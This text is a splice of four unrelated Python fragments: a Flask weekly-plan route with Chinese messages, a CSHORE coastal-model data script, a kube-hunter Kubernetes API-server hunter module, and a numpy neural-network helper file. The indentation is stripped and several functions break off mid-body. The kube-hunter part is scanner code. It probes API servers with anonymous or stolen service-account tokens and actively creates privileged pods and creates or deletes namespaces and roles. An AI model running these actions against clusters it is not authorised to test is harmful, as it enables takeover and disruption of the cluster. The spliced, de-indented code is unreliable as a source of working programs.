def timeManagementWeeklyPlanAdd():
title = request.form['title']
monthlyPlanId = request.form['monthlyPlanId']
startTime = request.form['startTime']
endTime = request.form['endTime']
planLevel = request.form.getlist('planLevel[]')
planTitle = request.form.getlist('planTitle[]')
if not strLength(title,1,100):
return jsonify({'status': False, 'info': u'请输入1-100个字符的周计划标题!'})
if not startTime or not endTime:
return jsonify({'status': False, 'info': u'请选择时间范围!'})
startTime = strToDatetime('%s 00:00:00' % startTime)
endTime = strToDatetime('%s 23:59:59' % endTime)
if endTime <= startTime:
return jsonify({'status': False, 'info': u'结束时间必须要晚于开始时间!'})
m = MonthlyPlan.objects(id=monthlyPlanId).first()
#时间范围判断
#周计划的时间范围必须在月计划的时间范围内
if not (startTime>=m.startTime and endTime<=m.endTime):
return jsonify({'status': False, 'info': u'周计划的时间范围必须在月计划的时间范围内!'})
#该年计划下的月计划时间范围不冲突
wps = WeeklyPlan.objects(monthlyPlan=m)
for i in wps:
if not (startTime >= i.endTime or endTime <= i.startTime):
return jsonify({'status': False, 'info': u'周计划的时间范围(%s - %s)和“%s”的时间范围(%s - %s)冲突' %
(startTime,endTime,i.title,i.startTime,i.endTime)})
plans = []
for index, t in enumerate(planTitle):
if len(t) > 0:
p = Plan()
p.title = t
p.level = planLevel[index]
plans.append(p)
w = WeeklyPlan()
w.title = title
w.startTime = startTime
w.endTime = endTime
w.plans = plans
w.monthlyPlan = m
w.save()
return jsonify({'status': True, 'info': u'周计划添加成功!'})
@bpAdmin.route("/timeManagementWeeklyPlanEdit/<id>",methods=['GET','POST'])
@login_required
def | |
go up one
yaml_dir = os.path.dirname(yaml_dir)
if 'MOBILE' in version_prefix:
globalYaml = os.path.join(yaml_dir, 'yaml_files/CSHORE/CSHORE_mobile_global.yml')
varYaml = os.path.join(yaml_dir, 'yaml_files/CSHORE/CSHORE_mobile_var.yml')
elif 'FIXED' in version_prefix:
globalYaml = os.path.join(yaml_dir, 'yaml_files/CSHORE/CSHORE_fixed_global.yml')
varYaml = os.path.join(yaml_dir, 'yaml_files/CSHORE/CSHORE_fixed_var.yml')
else:
raise NotImplementedError('please check version prefix')
assert globalYaml is not None, 'CSHORE_analysis Error: Version prefix not recognized'
NCpath = makeNCdir(netCDFdir, version_prefix, date_str, model='CSHORE')
# make the name of this nc file your OWN SELF BUM!
NCname = 'CMTB-morphModels_CSHORE_%s_%s.nc' %(version_prefix, date_str)
makenc.makenc_CSHORErun(os.path.join(NCpath, NCname), nc_dict, globalYaml, varYaml)
t = 1
def makeCSHORE_ncdict(startTime,inputDict):
"""
Args:
startTime (str): this is the time that all the CSHORE runs are tagged by (e.g., '2012-12-31T00:30:30Z')
inputDicts (dict): keys are
version_prefix - right now we have MOBILE, MOBILE_RESET. FIXED
workingDir - path to the working directory the user wants
Returns:
nc_dict (dict): the dictionary with keys that you hand to the nc file
(the data has been rotated back to the standard FRF conventions)
"""
version_prefix = inputDict['version_prefix']
workingDir = inputDict['workingDirectory']
model = 'CSHORE'
# initialize the class
cshore_io = inputOutput.cshoreIO()
# get into the directory I need
start_dir = workingDir
path_prefix = "%s/" % version_prefix # data super directiory
d_s = DT.datetime.strptime(startTime, '%Y-%m-%dT%H:%M:%SZ')
date_str = d_s.strftime('%Y-%m-%dT%H%M%SZ') # THE COLONS!!! startTime has COLONS!!!
params, bc, veg, hydro, sed, morpho, meta = cshore_io.load_CSHORE_results(os.path.join(start_dir, model, path_prefix, date_str))
# params - metadata about the run
# bc - boundary condition data, but for some reason it does not include the initial conditions?
# veg - vegetation information
# hydro - current and wave information
# sed - sediment information
# morpho - bed elevation information
# try out the makeCSHORE_ncdict function!!
nc_dict = {}
dim_t = len(hydro['umean'])
dim_x = len(hydro['umean'][0])
step = hydro['time_end'][1] - hydro['time_end'][0]
pierang = 71.8
# get my time stuff!!!
times = np.array([d_s + DT.timedelta(seconds=s) for s in np.ravel(hydro['time_end'] + step)])
# The 1800 will set the time to be IN BETWEEN the start time and end time
timeunits = 'seconds since 1970-01-01 00:00:00'
nc_dict['time'] = nc.date2num(times, timeunits)
# get my cross-shore X (and Y!!!) in FRF coords!!!
nc_dict['xFRF'] = meta["BC_FRF_X"] - morpho['x'][0]
nc_dict['yFRF'] = meta["BC_FRF_Y"]
# get my stuff that needs to be rotated
test_fun = lambda x: vectorRotation(x, theta=pierang + (90 - pierang) + pierang)
nc_dict['aveE'] = np.zeros([dim_t, dim_x])
nc_dict['aveN'] = np.zeros([dim_t, dim_x])
nc_dict['stdE'] = np.zeros([dim_t, dim_x])
nc_dict['stdN'] = np.zeros([dim_t, dim_x])
nc_dict['waveMeanDirection'] = np.zeros([dim_t, dim_x]) + np.nan
nc_dict['qbx'] = np.zeros([dim_t, dim_x])
nc_dict['qby'] = np.zeros([dim_t, dim_x])
nc_dict['qsx'] = np.zeros([dim_t, dim_x])
nc_dict['qsy'] = np.zeros([dim_t, dim_x])
for ii in range(0, len(hydro['umean'])):
# current stuff
newV = [test_fun(x) for x in zip(hydro['umean'][ii][:], hydro['vmean'][ii][:])]
nc_dict['aveE'][ii] = zip(*newV)[0]
nc_dict['aveN'][ii] = zip(*newV)[1]
newStd = [test_fun(x) for x in zip(hydro['ustd'][ii][:], hydro['vstd'][ii][:])]
nc_dict['stdE'][ii] = zip(*newStd)[0]
nc_dict['stdN'][ii] = zip(*newStd)[1]
# wave angle
t1 = 360 / float(2 * np.pi) * hydro['stheta'][ii]
t1[~np.isnan(t1)] = STWangle2geo(t1[~np.isnan(t1)], pierang=pierang)
nc_dict['waveMeanDirection'][ii] = t1
# sediment transport rate
new_qb = [test_fun(x) for x in zip(sed['qbx'][ii][:], sed['qby'][ii][:])]
nc_dict['qbx'][ii] = zip(*new_qb)[0]
nc_dict['qby'][ii] = zip(*new_qb)[1]
new_qs = [test_fun(x) for x in zip(sed['qsx'][ii][:], sed['qsy'][ii][:])]
nc_dict['qsx'][ii] = zip(*new_qs)[0]
nc_dict['qsy'][ii] = zip(*new_qs)[1]
# wave and WL stuff!!!!
nc_dict['waveHs'] = hydro['Hs']
nc_dict['waterLevel'] = hydro['mwl']
nc_dict['stdWaterLevel'] = hydro['sigma']
nc_dict['setup'] = hydro['mwl'] - hydro['swl']
# runup stuff!
nc_dict['runup2perc'] = hydro['runup_2_percent']
nc_dict['runupMean'] = hydro['runup_mean']
# other sediment stuff
nc_dict['probabilitySuspension'] = sed['ps']
nc_dict['probabilityMovement'] = sed['pb']
nc_dict['suspendedSedVolume'] = sed['vs']
# bathymetry
nc_dict['bottomElevation'] = morpho['zb'] # you may have to screw with this with fixed vs. mobile???
# if the fixed bed just copies the same bathy to each time-step, you will need to just take the first one!!!
nc_dict['surveyNumber'] = np.zeros([dim_t]) + meta['bathy_surv_num']
nc_dict['profileNumber'] = np.zeros([dim_t]) + meta['bathy_prof_num']
nc_dict['bathymetryDate'] = nc.date2num(np.array([meta['bathy_surv_stime'] + DT.timedelta(hours=0) for i in xrange(dim_t)]), timeunits)
return nc_dict
def CSHOREsimSetup(startTime, inputDict):
"""Author: <NAME>, Master of the Universe
Association: USACE CHL Field Research Facility
Project: Coastal Model Test Bed
This Function is the master call for the data preperation for the Coastal Model
Test Bed (CMTB). It is designed to pull from GetData and utilize
prep_datalib for development of the FRF CMTB
NOTE: input to the function is the end of the duration. All Files are labeled by this convention
all time stamps otherwise are top of the data collection
Args:
startTime (str): this is the start time for the simulation (string in format e.g., '2016-06-02T10:00:00Z' )
THIS MAY NOT BE THE SAME AS THE ONE IN INPUT DICT
i.e., if it is looping over a bunch of 24 hour simulations
that is also why it is a seperate variable
inputDict (dict): input dictionary with keys
simulationDuration - duration of each simulation in hours
version_prefix - right now we have FIXED, MOBILE, and MOBILE_RESET
profileNumber - this is either the survery profile number or the alongshore location for the integrated bathy
bathyLoc - where are we getting our bathy data (surveys or integrated bathy)
workindDir - location where the user wants to have all the data and stuff
"""
# pull the stuff I need out of the dict
timerun = inputDict['simulationDuration']
version_prefix = inputDict['version_prefix']
profile_num = inputDict['profileNumber']
bathy_loc = inputDict['bathyLoc']
workingDir = inputDict['workingDirectory']
if 'THREDDS' in inputDict:
server = inputDict['THREDDS']
else:
print('Chosing CHL thredds by Default, this may be slower!')
server = 'CHL'
# ____________________GENERAL ASSUMPTION VARIABLES__________
model = 'CSHORE'
path_prefix = os.path.join(workingDir, model, '%s/' % version_prefix)
time_step = 1 # time step for model in hours
dx = 1 # cross-shore grid spacing (FRF coord units - m)
fric_fac = 0.015
# ______________________________________________________________________________
# _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _ _
# Time Stuff!
if type(timerun) == str:
timerun = int(timerun)
start_time = DT.datetime.strptime(startTime, '%Y-%m-%dT%H:%M:%SZ')
# scream at them if the simulation does not start on a whole hour!
assert start_time.minute == 0 and start_time.second == 0 and start_time.microsecond == 0, 'Your simulation must start on the hour!'
end_time = start_time + DT.timedelta(days=0, hours=timerun) # removed for ilab=1 , minutes=1)
date_str = start_time.strftime('%Y-%m-%dT%H%M%SZ')
# start making my metadata dict
meta_dict = {'startTime': startTime,
'timerun': timerun,
'time_step': time_step,
'dx': dx,
'fric_fac': fric_fac,
'version': version_prefix}
ftime = timerun * 3600 # [sec] final time, dictates model duration
dt = time_step * 3600 # time interval (sec) for wave and water level conditions
BC_dict = {'timebc_wave': np.arange(0, ftime + dt, dt)}
# ______________________________________________________________________________
# __________________Make Diretories_____________________________________________
if not os.path.exists(path_prefix + date_str): # if it doesn't exist
os.makedirs(path_prefix + date_str) # make the directory
if not os.path.exists(path_prefix + date_str + "/figures/"):
os.makedirs(path_prefix + date_str + "/figures/")
print "Model Time Start : %s Model Time End: %s" % (start_time, end_time)
print u"Files will be placed in {0} folder".format(path_prefix + date_str)
# decision time - fixed vs mobile
if version_prefix == 'FIXED':
# if it is fixed, first thing to do is get waves
## _____________WAVES____________________________
frf_Data = getObs(start_time, end_time + DT.timedelta(days=0, hours=0, minutes=1), THREDDS=server)
# Attempt to get 8m array first!!!
try:
wave_data = frf_Data.getWaveSpec(gaugenumber=12)
meta_dict['BC_gage'] = wave_data['name']
print "_________________\nGathering Wave Data from %s" % (wave_data['name'])
# check to see if I am missing my first and last points - if so then I can't interpolate
assert start_time in wave_data['time'] and end_time in wave_data['time'], 'Wave data are missing for simulation start time or end time!'
# if I am missing more than 1/4 of the data I should have, abort the run
assert len(wave_data['Hs']) > 0.75 * len(BC_dict['timebc_wave']), 'Missing more than 25% of wave data'
# get missing wave data if there is any!
date_list = np.array([start_time + DT.timedelta(hours=x) for x in range(0, timerun + 1)])
dum_var = [x not in wave_data['time'] for x in date_list]
if sum(dum_var) == 0:
meta_dict['blank_wave_data'] = np.nan
else:
meta_dict['blank_wave_data'] = date_list[np.argwhere( dum_var).flatten()] # this will list all the times that wave data should exist, but doesn't
print "%d wave records with %d interpolated points" % (np.shape(wave_data['dWED'])[0], timerun + 1 - len(wave_data['dWED']))
helper = | |
import logging
import json
import uuid
import requests
from kube_hunter.conf import get_config
from kube_hunter.modules.discovery.apiserver import ApiServer
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
from kube_hunter.core.types import Hunter, ActiveHunter, KubernetesCluster
from kube_hunter.core.types import (
AccessRisk,
InformationDisclosure,
UnauthenticatedAccess,
)
logger = logging.getLogger(__name__)
class ServerApiAccess(Vulnerability, Event):
"""The API Server port is accessible.
Depending on your RBAC settings this could expose access to or control of your cluster."""
def __init__(self, evidence, using_token):
if using_token:
name = "Access to API using service account token"
category = InformationDisclosure
else:
name = "Unauthenticated access to API"
category = UnauthenticatedAccess
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV005",
)
self.evidence = evidence
class ServerApiHTTPAccess(Vulnerability, Event):
"""The API Server port is accessible over HTTP, and therefore unencrypted.
Depending on your RBAC settings this could expose access to or control of your cluster."""
def __init__(self, evidence):
name = "Insecure (HTTP) access to API"
category = UnauthenticatedAccess
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=category,
vid="KHV006",
)
self.evidence = evidence
class ApiInfoDisclosure(Vulnerability, Event):
def __init__(self, evidence, using_token, name):
if using_token:
name += " using service account token"
else:
name += " as anonymous user"
Vulnerability.__init__(
self,
KubernetesCluster,
name=name,
category=InformationDisclosure,
vid="KHV007",
)
self.evidence = evidence
class ListPodsAndNamespaces(ApiInfoDisclosure):
""" Accessing pods might give an attacker valuable information"""
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing pods")
class ListNamespaces(ApiInfoDisclosure):
""" Accessing namespaces might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing namespaces")
class ListRoles(ApiInfoDisclosure):
""" Accessing roles might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing roles")
class ListClusterRoles(ApiInfoDisclosure):
""" Accessing cluster roles might give an attacker valuable information """
def __init__(self, evidence, using_token):
ApiInfoDisclosure.__init__(self, evidence, using_token, "Listing cluster roles")
class CreateANamespace(Vulnerability, Event):
"""Creating a namespace might give an attacker an area with default (exploitable) permissions to run pods in."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created a namespace",
category=AccessRisk,
)
self.evidence = evidence
class DeleteANamespace(Vulnerability, Event):
""" Deleting a namespace might give an attacker the option to affect application behavior """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Delete a namespace",
category=AccessRisk,
)
self.evidence = evidence
class CreateARole(Vulnerability, Event):
"""Creating a role might give an attacker the option to harm the normal behavior of newly created pods
within the specified namespaces.
"""
def __init__(self, evidence):
Vulnerability.__init__(self, KubernetesCluster, name="Created a role", category=AccessRisk)
self.evidence = evidence
class CreateAClusterRole(Vulnerability, Event):
"""Creating a cluster role might give an attacker the option to harm the normal behavior of newly created pods
across the whole cluster
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class PatchARole(Vulnerability, Event):
"""Patching a role might give an attacker the option to create new pods with custom roles within the
specific role's namespace scope
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched a role",
category=AccessRisk,
)
self.evidence = evidence
class PatchAClusterRole(Vulnerability, Event):
"""Patching a cluster role might give an attacker the option to create new pods with custom roles within the whole
cluster scope.
"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class DeleteARole(Vulnerability, Event):
""" Deleting a role might allow an attacker to affect access to resources in the namespace"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted a role",
category=AccessRisk,
)
self.evidence = evidence
class DeleteAClusterRole(Vulnerability, Event):
""" Deleting a cluster role might allow an attacker to affect access to resources in the cluster"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class CreateAPod(Vulnerability, Event):
""" Creating a new pod allows an attacker to run custom code"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created A Pod",
category=AccessRisk,
)
self.evidence = evidence
class CreateAPrivilegedPod(Vulnerability, Event):
""" Creating a new PRIVILEGED pod would gain an attacker FULL CONTROL over the cluster"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created A PRIVILEGED Pod",
category=AccessRisk,
)
self.evidence = evidence
class PatchAPod(Vulnerability, Event):
""" Patching a pod allows an attacker to compromise and control it """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched A Pod",
category=AccessRisk,
)
self.evidence = evidence
class DeleteAPod(Vulnerability, Event):
""" Deleting a pod allows an attacker to disturb applications on the cluster """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted A Pod",
category=AccessRisk,
)
self.evidence = evidence
class ApiServerPassiveHunterFinished(Event):
def __init__(self, namespaces):
self.namespaces = namespaces
# This Hunter checks what happens if we try to access the API Server without a service account token
# If we have a service account token we'll also trigger AccessApiServerWithToken below
@handler.subscribe(ApiServer)
class AccessApiServer(Hunter):
"""API Server Hunter
Checks if API server is accessible
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
self.headers = {}
self.with_token = False
def access_api_server(self):
config = get_config()
logger.debug(f"Passive Hunter is attempting to access the API at {self.path}")
try:
r = requests.get(f"{self.path}/api", headers=self.headers, verify=False, timeout=config.network_timeout)
if r.status_code == 200 and r.content:
return r.content
except requests.exceptions.ConnectionError:
pass
return False
def get_items(self, path):
config = get_config()
try:
items = []
r = requests.get(path, headers=self.headers, verify=False, timeout=config.network_timeout)
if r.status_code == 200:
resp = json.loads(r.content)
for item in resp["items"]:
items.append(item["metadata"]["name"])
return items
logger.debug(f"Got HTTP {r.status_code} respone: {r.text}")
except (requests.exceptions.ConnectionError, KeyError):
logger.debug(f"Failed retrieving items from API server at {path}")
return None
def get_pods(self, namespace=None):
config = get_config()
pods = []
try:
if not namespace:
r = requests.get(
f"{self.path}/api/v1/pods",
headers=self.headers,
verify=False,
timeout=config.network_timeout,
)
else:
r = requests.get(
f"{self.path}/api/v1/namespaces/{namespace}/pods",
headers=self.headers,
verify=False,
timeout=config.network_timeout,
)
if r.status_code == 200:
resp = json.loads(r.content)
for item in resp["items"]:
name = item["metadata"]["name"].encode("ascii", "ignore")
namespace = item["metadata"]["namespace"].encode("ascii", "ignore")
pods.append({"name": name, "namespace": namespace})
return pods
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def execute(self):
api = self.access_api_server()
if api:
if self.event.protocol == "http":
self.publish_event(ServerApiHTTPAccess(api))
else:
self.publish_event(ServerApiAccess(api, self.with_token))
namespaces = self.get_items("{path}/api/v1/namespaces".format(path=self.path))
if namespaces:
self.publish_event(ListNamespaces(namespaces, self.with_token))
roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/roles")
if roles:
self.publish_event(ListRoles(roles, self.with_token))
cluster_roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles")
if cluster_roles:
self.publish_event(ListClusterRoles(cluster_roles, self.with_token))
pods = self.get_pods()
if pods:
self.publish_event(ListPodsAndNamespaces(pods, self.with_token))
# If we have a service account token, this event should get triggered twice - once with and once without
# the token
self.publish_event(ApiServerPassiveHunterFinished(namespaces))
@handler.subscribe(ApiServer, predicate=lambda x: x.auth_token)
class AccessApiServerWithToken(AccessApiServer):
"""API Server Hunter
Accessing the API server using the service account token obtained from a compromised pod
"""
def __init__(self, event):
super(AccessApiServerWithToken, self).__init__(event)
assert self.event.auth_token
self.headers = {"Authorization": f"Bearer {self.event.auth_token}"}
self.category = InformationDisclosure
self.with_token = True
# Active Hunter
@handler.subscribe(ApiServerPassiveHunterFinished)
class AccessApiServerActive(ActiveHunter):
"""API server hunter
Accessing the api server might grant an attacker full control over the cluster
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
def create_item(self, path, data):
config = get_config()
headers = {"Content-Type": "application/json"}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.post(path, verify=False, data=data, headers=headers, timeout=config.network_timeout)
if res.status_code in [200, 201, 202]:
parsed_content = json.loads(res.content)
return parsed_content["metadata"]["name"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def patch_item(self, path, data):
config = get_config()
headers = {"Content-Type": "application/json-patch+json"}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.patch(path, headers=headers, verify=False, data=data, timeout=config.network_timeout)
if res.status_code not in [200, 201, 202]:
return None
parsed_content = json.loads(res.content)
# TODO is there a patch timestamp we could use?
return parsed_content["metadata"]["namespace"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def delete_item(self, path):
config = get_config()
headers = {}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.delete(path, headers=headers, verify=False, timeout=config.network_timeout)
if res.status_code in [200, 201, 202]:
parsed_content = json.loads(res.content)
return parsed_content["metadata"]["deletionTimestamp"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def create_a_pod(self, namespace, is_privileged):
privileged_value = {"securityContext": {"privileged": True}} if is_privileged else {}
random_name = str(uuid.uuid4())[0:5]
pod = {
"apiVersion": "v1",
"kind": "Pod",
"metadata": {"name": random_name},
"spec": {
"containers": [
{"name": random_name, "image": "nginx:1.7.9", "ports": [{"containerPort": 80}], **privileged_value}
]
},
}
return self.create_item(path=f"{self.path}/api/v1/namespaces/{namespace}/pods", data=json.dumps(pod))
def delete_a_pod(self, namespace, pod_name):
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}")
if not delete_timestamp:
logger.error(f"Created pod {pod_name} in namespace {namespace} but unable to delete it")
return delete_timestamp
def patch_a_pod(self, namespace, pod_name):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}",
data=json.dumps(data),
)
def create_namespace(self):
random_name = (str(uuid.uuid4()))[0:5]
data = {
"kind": "Namespace",
"apiVersion": "v1",
"metadata": {"name": random_name, "labels": {"name": random_name}},
}
return self.create_item(path=f"{self.path}/api/v1/namespaces", data=json.dumps(data))
def delete_namespace(self, namespace):
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}")
if delete_timestamp is None:
logger.error(f"Created namespace {namespace} but failed to delete it")
return delete_timestamp
def create_a_role(self, namespace):
name = str(uuid.uuid4())[0:5]
role = {
"kind": "Role",
| |
"""
mathEX.py
@author: <NAME>
@email: <EMAIL>
Math-related functions, extensions.
"""
import numpy as np
def change_to_multi_class(label_set, num_of_labels):
"""
change the input prediction y to array-wise multi_class classifiers.
:param label_set:input prediction y, numpy arrays
:param num_of_labels: number of class we want to classify, ints
:return: array-wise multi_class classifiers
"""
number_of_samples = label_set.shape[1]
multi_class_y = np.zeros([num_of_labels, number_of_samples])
for i in range(number_of_samples):
label = label_set[0, i]
multi_class_y[int(label), i] = 1
return multi_class_y
def compute_cost(training_result, label_set):
"""
compute costs between output results and actual results y. NEEDS TO BE MODIFIED.
:param training_result: output results, numpy arrays
:param label_set: actual result, numpy arrays
:return: cost, floats
"""
num_of_samples = label_set.shape[1]
# Compute loss from aL and y.
cost = sum(sum((1. / num_of_samples) * (-np.dot(label_set, np.log(training_result).T) - np.dot(1 - label_set, np.log(1 - training_result).T))))
cost = np.squeeze(cost)
assert (cost.shape == ())
return cost
def compute_cost_with_l2_regularization(training_result, label_set, parameters, lambd):
"""
compute costs with L2 regularization, uses the original cost function.
:param training_result: results AL, numpy arrays
:param label_set: actual results y, numpy arrays
:param parameters: parameters got from forward propagation, dictionaries
:param lambd: lambda for regularization, floats
:return: cost, floats
"""
num_of_samples = label_set.shape[1]
num_of_parameters = len(parameters) // 2
w_square_sum = 0
# adding up Ws
for i in range(num_of_parameters):
w_square_sum += np.sum(np.square(parameters['W'+str(i+1)]))
# compute regular costs
cross_entropy_cost = compute_cost(training_result, label_set)
# combine regular costs and regularization term
l2_regularization_cost = (lambd / (2 * num_of_samples)) * w_square_sum
cost = cross_entropy_cost + l2_regularization_cost
return cost
def initialize_parameters_deep_he(layer_dims):
"""
initialization for deep learning with HE random algorithm to prevent fading & exploding gradients.
:param layer_dims: dimensions of layers, lists
:return: initialized parameters
"""
np.random.seed(1)
parameters = {}
num_of_layers = len(layer_dims) # number of layers in the network
for l in range(1, num_of_layers):
# initialized W with random and HE term
parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1]) * np.sqrt(2 / layer_dims[l - 1])
parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))
assert (parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1]))
assert (parameters['b' + str(l)].shape == (layer_dims[l], 1))
return parameters
"""
def initialize_parameters_deep(layer_dims):
np.random.seed(1)
parameters = {}
L = len(layer_dims) # number of layers in the network
for l in range(1, L):
parameters['W' + str(l)] = np.random.randn(layer_dims[l], layer_dims[l - 1])
parameters['b' + str(l)] = np.zeros((layer_dims[l], 1))
assert (parameters['W' + str(l)].shape == (layer_dims[l], layer_dims[l - 1]))
assert (parameters['b' + str(l)].shape == (layer_dims[l], 1))
return parameters
"""
def l_model_forward(input_set, parameters):
"""
Forward propagation of deep learning.
:param input_set: input x, numpy arrays
:param parameters:
:return: output aL and caches for following calculations, numpy arrays and indexes
"""
caches = []
last_set = input_set
num_of_layers = len(parameters) // 2 # number of layers in the neural network
# Implement [LINEAR -> RELU]*(L-1). Add "cache" to the "caches" list.
for l in range(1, num_of_layers):
a_prev = last_set
# use relu or leaky relu in hiden layers
last_set, cache = linear_activation_forward(a_prev, parameters['W' + str(l)], parameters['b' + str(l)],
activation="leaky_relu") #was relu
caches.append(cache)
# Implement LINEAR -> SIGMOID. Add "cache" to the "caches" list.
# output layer with sigmoid activation
training_result, cache = linear_activation_forward(last_set, parameters['W' + str(num_of_layers)], parameters['b' + str(num_of_layers)], activation="sigmoid")
caches.append(cache)
assert (training_result.shape == (10, input_set.shape[1])) # shape[0] should be same with shape[0] of output layer
return training_result, caches
def L_model_backward_with_l2(training_result, label_set, caches, lambd):
"""
Backward propagation for deep learning with L2 regularization.
:param training_result: output AL, numpy arrays
:param label_set: actual answers y, numpy arrays
:param caches: caches from forward propagation, dictionaries
:param lambd: regularization parameter lambda, floats
:return: gradients for gradient decent, dictionaries
"""
grads = {}
num_of_layers = len(caches) # the number of layers
num_of_samples = training_result.shape[1]
label_set = label_set.reshape(training_result.shape) # after this line, Y is the same shape as AL
# Initializing the back propagation
d_training_result = - (np.divide(label_set, training_result) - np.divide(1 - label_set, 1 - training_result))
# Lth layer Inputs: "AL, Y, caches". Outputs: "grads["dAL"], grads["dWL"], grads["dbL"]
current_cache = caches[num_of_layers - 1]
grads["dA" + str(num_of_layers - 1)], grads["dW" + str(num_of_layers)], grads["db" + str(num_of_layers)] = linear_activation_backward_with_l2(d_training_result, current_cache, lambd, activation="sigmoid")
for l in reversed(range(num_of_layers - 1)):
# lth layer: (RELU -> LINEAR) gradients.
current_cache = caches[l]
# use relu or leaky relu for hiden layers
da_prev_temp, dw_temp, db_temp = linear_activation_backward_with_l2(grads["dA" + str(l + 1)], current_cache,
lambd, activation="leaky_relu")
grads["dA" + str(l)] = da_prev_temp
grads["dW" + str(l + 1)] = dw_temp
grads["db" + str(l + 1)] = db_temp
return grads
def linear_activation_backward_with_l2(d_current_set, cache, lambd, activation):
"""
activation step for backward propagation with multiple choices of activation function.
:param d_current_set: dA from last step of backward propagation, numpy arrays
:param cache: caches in deep learning, dictionaries
:param lambd: regularization parameter lambda, floats
:param activation: choice of activation, strings
:return: last dA, dW, db, numpy arrays
"""
linear_cache, activation_cache = cache
if activation == "relu":
d_z = relu_backward(d_current_set, activation_cache)
d_a_prev, d_w, d_b = linear_backward_with_l2(d_z, linear_cache, lambd)
elif activation == "sigmoid":
d_z = sigmoid_backward(d_current_set, activation_cache)
d_a_prev, d_w, d_b = linear_backward_with_l2(d_z, linear_cache, lambd)
elif activation == "leaky_relu":
d_z = leaky_relu_backward(d_current_set, activation_cache)
d_a_prev, d_w, d_b = linear_backward_with_l2(d_z, linear_cache, lambd)
return d_a_prev, d_w, d_b
def linear_activation_forward(a_prev, parameter_w, parameter_b, activation):
"""
activation step for forward propagation with multiple choices of activation function.
:param a_prev: previous A from last step of forward propagation, numpy arrays
:param parameter_w: parameter W in current layer, numpy arrays
:param parameter_b: parameter b in current layer, numpy arrays
:param activation: choice of activation, strings
:return: current A and cache for following calculation
"""
if activation == "sigmoid":
# Inputs: "A_prev, W, b". Outputs: "A, activation_cache".
current_z, linear_cache = linear_forward(a_prev, parameter_w, parameter_b)
A, activation_cache = sigmoid(current_z)
elif activation == "relu":
# Inputs: "A_prev, W, b". Outputs: "A, activation_cache".
current_z, linear_cache = linear_forward(a_prev, parameter_w, parameter_b)
A, activation_cache = relu(current_z)
elif activation == "leaky_relu":
# Inputs: "A_prev, W, b". Outputs: "A, activation_cache".
current_z, linear_cache = linear_forward(a_prev, parameter_w, parameter_b)
A, activation_cache = leaky_relu(current_z)
assert (A.shape == (parameter_w.shape[0], a_prev.shape[1]))
cache = (linear_cache, activation_cache)
return A, cache
def linear_backward_with_l2(d_z, cache, lambd):
"""
linear step in backward propagation.
:param d_z: current dZ, numpy arrays
:param cache: caches from previous calculation, dictionaries
:param lambd: regularization parameter lambda, floats
:return: previous dA, current dW, db, numpy arrays
"""
a_prev, w, b = cache
m = a_prev.shape[1]
d_w = 1. / m * np.dot(d_z, a_prev.T) + (lambd / m) * w
db = 1. / m * np.sum(d_z, axis=1, keepdims=True)
da_prev = np.dot(w.T, d_z)
# dA_prev = dropouts_backward(dA_prev, D, keep_prob)
assert (da_prev.shape == a_prev.shape)
assert (d_w.shape == w.shape)
assert (db.shape == b.shape)
return da_prev, d_w, db
def linear_forward(current_set, parameter_w, parameter_b):
"""
linear step for forward propagation
:param current_set: current A, numpy arrays
:param parameter_w: current parameter W, numpy arrays
:param parameter_b: current parameter b, numpy arrays
:return: current z, and caches for following calculations, numpy arrays and dictionaries
"""
current_z = parameter_w.dot(current_set) + parameter_b
assert (current_z.shape == (parameter_w.shape[0], current_set.shape[1]))
cache = (current_set, parameter_w, parameter_b)
return current_z, cache
